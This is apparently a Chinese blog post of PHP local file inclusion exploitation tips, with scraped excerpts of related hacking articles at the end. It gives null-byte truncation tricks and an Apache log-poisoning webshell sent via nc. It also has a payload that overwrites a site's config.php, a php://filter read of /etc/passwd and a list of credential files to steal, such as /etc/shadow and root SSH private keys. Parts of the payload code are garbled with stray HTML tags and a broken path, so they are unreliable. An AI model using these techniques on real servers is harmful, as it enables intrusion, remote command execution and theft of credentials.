IFI 利用技巧

include后的文件带后缀的利用条件:

(1)gpc=Off 不然%00会变成\0的

(2)php < 5.3.4  本人测试在5.4.4中未成功,详情见CVE-2006-7243

include包含的时候一定得有相关的权限,apache用户和所访问文件至少也得达到同组权限。

截断方法:

(1)%00,gpc=Off

(2)长文件名,linux超过4096字节就会被php截断,没有实验成功(5.2.8),windows 259字节,没尝试,这里与GPC没有关系。 linux下使用../../../../../etc/passwd/./././././././ ,windows使用.....,楼下连接测试成功或者和linux一样

包含文件技巧:

1,包含上传后的文件,比如说图片,文件等

2,data:// php://input等伪协议,需要allow_url_include=on

3,日志文件,access.log,通过nc来去掉header,防止空格被编码成%20.

[email protected]:/var/log/apache2# nc 127.0.0.1 80

GET /<?php passthru($_GET[‘cmd‘]); ?> HTTP/1.1

查看access.log有日志:

127.0.0.1 - - [09/Apr/2015:03:53:21 -0400] "[email protected]:/var/log/apache2# nc -h" 400 582 "-" "-"

127.0.0.1 - - [09/Apr/2015:03:53:45 -0400] "GET /<?php passthru($_GET[‘cmd‘]); ?> HTTP/1.1" 404 480 "-" "-"

然后直接加载该日志,如果日志很大的话,可以写一句话创建一个文件什么的,执行一次就能拿到shell

eg:

<?$fp=fopen("/homeirtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<span style="font-family: Arial, Helvetica, sans-serif;"><?php echo hacked ?></span><span style="font-family: Arial, Helvetica, sans-serif;">");fclose($fp);?></span>

4,/proc/self/environ中user-agent可改

(1):about:config 后加general.useragent.override ,value 填 <?phpinfo();?>即可,或者使用useragent switch

测试过程中,要么是没权限,要么是在这个文件中没有读到user-agent字段

5,session file

6,另外其他php创建的文件什么的

比较优雅的读出文件:

https://10.20.30.50/fi?file=php://filter/read=convert.base64-encode/resource=../../../../../etc/passwd%00

测试文件夹是否存在。。

../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00

用于目录遍历,需要读权限:

/var/lib/locate.db

/var/lib/mlocate/mlocate.db

/usr/local/apache2/conf/httpd.conf

有root权限:

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_rsa.keystore

/root/.ssh/id_rsa.pub

/root/.ssh/known_hosts

/etc/shadow

/root/.bash_history

/root/.mysql_history

/proc/self/fd/fd[0-9]* (文件标识符)

/proc/mounts

/proc/config.gz

如何防范:

(1)gpc

(2)readdir限制

(3)当然不能动态包含了

file_exists,move_uploaded_files,file_get_contents都受影响

远程文件包含:

(1)allow_url_include=On,allow_url_fopen=On

可以用?来截断

可以用到php的协议来读取文件,这样就能包含php文件了,哈哈,不然包含php文件都是被执行了。

参考:

http://www.joychou.org/index.php/web/truncated.html

https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/

http://drops.wooyun.org/tips/3827

时间: 2024-10-19 09:30:35

IFI 利用技巧的相关文章

【溢出利用技巧】house of spirit friendly stack overflow

学习了一下L-CTF中介绍的一个栈溢出利用技巧,记录一下. 样例代码如下: /*  * blackngel's vulnerable program slightly modified by gb_master  */ #include <stdio.h> #include <string.h> #include <stdlib.h> void fvuln(char *str1, int age) {   char *ptr1, name[32];   int loca

NFS Rsync 渗透利用技巧

条件:存在匿名访问 NFS 目录列举 方法1: nmap -script=nfs-ls.nse 127.0.0.1 方法2. 挂载到本地 mount -t nfs 192.168.0.1:/export/home/tmp/badperms 为了mount一个NFS共享需要首先在本地系统上创建一个目录,切换目录到/tmp/badperms然后你会看到位于IP地址为192.168.0.1上的export/home目录的内容. Rsync 目录列举 方法1: nmap -script=rsync-li

shellcode在栈溢出中的利用与优化

0x00 前言 在<Windows Shellcode学习笔记--shellcode的提取与测试>中介绍了如何对shellcode作初步优化,动态获取Windows API地址并调用,并通过程序实现自动提取机器码作为shellcode并保存到文件中. 弹框实例shellcode的bin文件已上传至github,地址如下: https://github.com/3gstudent/Shellcode-Generater/blob/master/shellcode.bin 注:shellcode.

&#8203;如何快速利用s02-45漏洞获取服务器权限

byantian365.com simeon 1.1CVE-2017-5638漏洞简介 Apache Struts 2是世界上最流行的JavaWeb服务器框架之一.然而在Struts 2上发现存在高危安全漏洞(CVE-2017-5638,S02-45),该漏洞影响到:Struts 2.3.5 - Struts 2.3.31,Struts 2.5 - Struts2.5.10 漏洞编号:CVE-2017-5638 漏洞等级:HIGH 漏洞名称:S2-045:Struts 2远程执行代码漏洞 漏洞影

基础渗透测试笔记二

xss跨站漏洞纯手打笔记(基础) XSS漏洞扫描 常用工具: wvs 椰树 safe3 Xelenium w3af vega xss扫描插件+burp Beef: beef+msf拿客户端shell(ie6 xp) use windows/browser/ms10_002_aurora set PAYLOAD windows/meterpreter/reverse_tvp PAYLOAD =>wondows/meterpreter/reverse_tcp set SRVHOST (my ip)

其他漏洞笔记合集

xss跨站漏洞纯手打笔记(基础) XSS漏洞扫描 常用工具: wvs 椰树 safe3 Xelenium w3af vega xss扫描插件+burp Beef: beef+msf拿客户端shell(ie6 xp) use windows/browser/ms10_002_aurora set PAYLOAD windows/meterpreter/reverse_tvp PAYLOAD =>wondows/meterpreter/reverse_tcp set SRVHOST (my ip)

OWASP top10

PhishTank 是互联网上免费提供恶意网址黑名单的组织之一,它的黑名单由世界各地的志愿者提供,且更新频繁. 1.XSS 1.1. XSS简介 跨站脚本攻击,英文全称是Cross Site Script,本来缩写是CSS,但是为了和层叠样式表有所区分,所以在安全领域叫做"XSS". XSS攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击. 1.2. XSS分类 XSS根据效果的不同可以分成如下几类 第

我的读书笔记-《异类》

书评: 个人觉以下三位的书评很好的概括了本书: 1.李开复的书评,成功公式: 才智+勤奋 + 机遇 + 社会环境 = 成功,其中机遇和社会环境是常常被我们忽略的 2.唐骏,我们只要掌握了成功的规律,就能创造缤纷多彩的人生,异类告诉我们成功规律发挥作用的前提条件是我们要正视我们的环境和机遇 3.徐小平,成功规律个失意的人带来勇气,给得意的人带来启迪 总结关键词,成功的规律,尤其是环境和机遇 序言,罗赛托之谜 一个人是否长寿取决于个人的行为习惯——我们的饮食.锻炼.我们的医疗条件.没有人想过健康还和

CVE-2017-7269—IIS 6.0 WebDAV远程代码执行漏洞分析

漏洞描述: 3月27日,在Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269),漏洞利用PoC开始流传,但糟糕的是这产品已经停止更新了.网上流传的poc下载链接如下. github地址:https://github.com/edwardz246003/IIS_exploit 结合上面的POC,我们对漏洞的成因及利用过程进行了详细的分析.在分析过程中,对poc的exploit利用技巧感到惊叹,多次使用同一个漏洞函数触发,而同一个漏洞同一段漏洞利用代码